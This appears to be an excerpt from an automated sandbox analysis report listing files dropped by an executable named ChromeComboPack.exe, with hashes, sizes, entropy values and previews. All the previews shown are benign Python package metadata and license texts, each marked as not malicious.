                                                                                                                                                                                                                                            SSDEEP:48:DfdqaaC3P1xe9okGw1w8wQwywbM0kvsJib0ts++kv0gMzvy0htC+heU01:DfdqaaC/12G2bHZokO+/36
                                                                                                                                                                                                                                            MD5:18B352E2051962B9F65C33BC651426BF
                                                                                                                                                                                                                                            SHA1:3DD8D93CF7695D1C9D7574751AB5B0DEE5DD7F9A
                                                                                                                                                                                                                                            SHA-256:8215C54EAD77D9DC5A108A25C6BDC72B5999AA6F62C9499A440359412AFA5A51
                                                                                                                                                                                                                                            SHA-512:D966BC2899079C0D9AC763C96EA59A550E00A54BDCEEB6D96B0A8CAA9F6A1C408E7E3946915432978EDE9EDF669EEC68035A55B094B69671A28428458760D99E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: backports.tarfile.Version: 1.2.0.Summary: Backport of CPython tarfile module.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/backports.tarfile.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'testing'.Requires-Dist: pytest-cov ; extra == 'testing
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1360
                                                                                                                                                                                                                                            Entropy (8bit):5.753738299642538
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:U6rn/2zDJ6rvbqfuG6rJnB6rU6rEsJYB6rXamx6rlCHmTKjaQliwxJlp5DQljQls:NnuXIzUurJwN5JjfAlqYK9liSlp5DQlP
                                                                                                                                                                                                                                            MD5:CF347AE8E31132435B127226F358F8CD
                                                                                                                                                                                                                                            SHA1:2C857B300638FF291651234BBB2C077BEEF494E4
                                                                                                                                                                                                                                            SHA-256:258A1F1C849E1175069A55A5D6CE357AFDD04E34CD5DE27093E4ACEC7A9D2CE1
                                                                                                                                                                                                                                            SHA-512:2A46C7FDFA2F9883BB1D761646B33BE9CE7B07280A5BF38992C1C84AB0449944EB0CAF34620CCC82DDBBC193F0D54AE67797D97863F70CA0C24EE55A3B401F9C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:backports.tarfile-1.2.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..backports.tarfile-1.2.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..backports.tarfile-1.2.0.dist-info/METADATA,sha256=ghXFTq132dxaEIolxr3HK1mZqm9iyUmaRANZQSr6WlE,2020..backports.tarfile-1.2.0.dist-info/RECORD,,..backports.tarfile-1.2.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..backports.tarfile-1.2.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..backports.tarfile-1.2.0.dist-info/top_level.txt,sha256=cGjaLMOoBR1FK0ApojtzWVmViTtJ7JGIK_HwXiEsvtU,10..backports/__init__.py,sha256=iOEMwnlORWezdO8-2vxBIPSR37D7JGjluZ8f55vzxls,81..backports/__pycache__/__init__.cpython-312.pyc,,..backports/tarfile/__init__.py,sha256=Pwf2qUIfB0SolJPCKcx3vz3UEu_aids4g4sAfxy94qg,108491..backports/tarfile/__main__.py,sha256=Yw2oGT1afrz2eBskzdPYL8ReB_3liApmhFkN2EbDmc4,59..backports/tarfile/__pycache__/__init__.cpython-312.pyc,,..back
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10
                                                                                                                                                                                                                                            Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:21v:ev
                                                                                                                                                                                                                                            MD5:9BA458821AD258B6EF62B47E91302982
                                                                                                                                                                                                                                            SHA1:9EDB9E6BA5C4001CE2FCCF328739292404EA9604
                                                                                                                                                                                                                                            SHA-256:7068DA2CC3A8051D452B4029A23B73595995893B49EC91882BF1F05E212CBED5
                                                                                                                                                                                                                                            SHA-512:3A296E5DADD5B406330BA088BFED33BE6960F8FF42DB6651E185FF14F2272FC819EF520D1A15BC40DA4E20B9CA0E5D79170EDF33F3D50937C7FBEDB338CAC730
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:backports.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11358
                                                                                                                                                                                                                                            Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                            MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                            SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                            SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                            SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4648
                                                                                                                                                                                                                                            Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                                            MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                                            SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                                            SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                                            SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2518
                                                                                                                                                                                                                                            Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                                            MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                                            SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                                            SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                                            SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):91
                                                                                                                                                                                                                                            Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                                            MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                                            SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                                            SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                                            SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):19
                                                                                                                                                                                                                                            Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                                            MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                                            SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                                            SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                                                            SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_metadata.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11358
                                                                                                                                                                                                                                            Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                            MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                            SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                            SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                            SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3944
                                                                                                                                                                                                                                            Entropy (8bit):5.015824473130961
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DHxQuiTaCP1nTGDbHRbnzQWHaiQq+fT5lWp8sSwTW:2PP9GDbHRbnp+rapPSwTW
                                                                                                                                                                                                                                            MD5:C3EB48CD13B50DDED7CD524E1E9DD4CE
                                                                                                                                                                                                                                            SHA1:7C9B0B50D0E667825DAB09902AD8376A5F2945B6
                                                                                                                                                                                                                                            SHA-256:83878CD8BB8BD0E89971454D0F4AB00C9529136F603AFB4EDC148F5D36CEF459
                                                                                                                                                                                                                                            SHA-512:056EBC250B7E82F91B5C5E96B1293F24D5E917E06846A9716A4D05B47C30FEB3781E439C77876CF7D8620BEBAA4A253039CA8DF122283DE304992E340F4DE8BF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: importlib_resources.Version: 6.4.0.Summary: Read resources from Python packages.Home-page: https://github.com/python/importlib_resources.Author: Barry Warsaw.Author-email: barry@python.org.Project-URL: Documentation, https://importlib-resources.readthedocs.io/.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=3.1.0 ; python_version < "3.10".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; ext
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7620
                                                                                                                                                                                                                                            Entropy (8bit):5.560551717923108
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:lX7qdX7ZgsP7JtILSVAn5V26+XuVYmBXx:lX7wX7ZBP7ELSVAni6+iBh
                                                                                                                                                                                                                                            MD5:67F5E26385B6BDCF2236A005A2D2BA32
                                                                                                                                                                                                                                            SHA1:3DCD8685638A90D121FD484138AFCAC9775E5D66
                                                                                                                                                                                                                                            SHA-256:967DD56FEEA143F1D2C4E98AC1F937C055E61C9AA0425146D55F7AD7C82510FA
                                                                                                                                                                                                                                            SHA-512:30B5812E930A00A476E570EBCC4611D54C911A8B1E4646949A887F551FC5ABDC933311A554B197C602F0DA7626DFE8877A3F267EFBC6D724E24A3E9B5FCC2E30
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_resources-6.4.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_resources-6.4.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_resources-6.4.0.dist-info/METADATA,sha256=g4eM2LuL0OiZcUVND0qwDJUpE29gOvtO3BSPXTbO9Fk,3944..importlib_resources-6.4.0.dist-info/RECORD,,..importlib_resources-6.4.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_resources-6.4.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..importlib_resources-6.4.0.dist-info/top_level.txt,sha256=fHIjHU1GZwAjvcydpmUnUrTnbvdiWjG4OEVZK8by0TQ,20..importlib_resources/__init__.py,sha256=uyp1kzYR6SawQBsqlyaXXfIxJx4Z2mM8MjmZn8qq2Gk,505..importlib_resources/__pycache__/__init__.cpython-312.pyc,,..importlib_resources/__pycache__/_adapters.cpython-312.pyc,,..importlib_resources/__pycache__/_common.cpython-312.pyc,,..importlib_resources/__pycache__/_itertools.cpython-312.pyc,,..importlib_resource
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20
                                                                                                                                                                                                                                            Entropy (8bit):3.6841837197791887
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:JSe8AW6D:3fD
                                                                                                                                                                                                                                            MD5:0613840F692BD9E064FEDD915DFD477A
                                                                                                                                                                                                                                            SHA1:64DF38B36F541BA1714C15FCA1A9CA8C94EF2DAA
                                                                                                                                                                                                                                            SHA-256:7C72231D4D46670023BDCC9DA6652752B4E76EF7625A31B83845592BC6F2D134
                                                                                                                                                                                                                                            SHA-512:78AA888C24B3468C94FCB8EB882561D4B6F19A0537A4CFDDDFF94ED8A4BAFE8DF0C2B620E70B57A61E8BA3F877856DB9ADA548DFCA8CAE86D4C3C525A4E9B7EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_resources.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21079
                                                                                                                                                                                                                                            Entropy (8bit):5.103530371859935
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:12Vpnu38/2K9tjUaNtT/yTCtYTnWDdg3GaXb51KLVgWTVPeEGsuPrAESM:12Vpnu38JZtT/yIdg3D51KLV7RPeEGs+
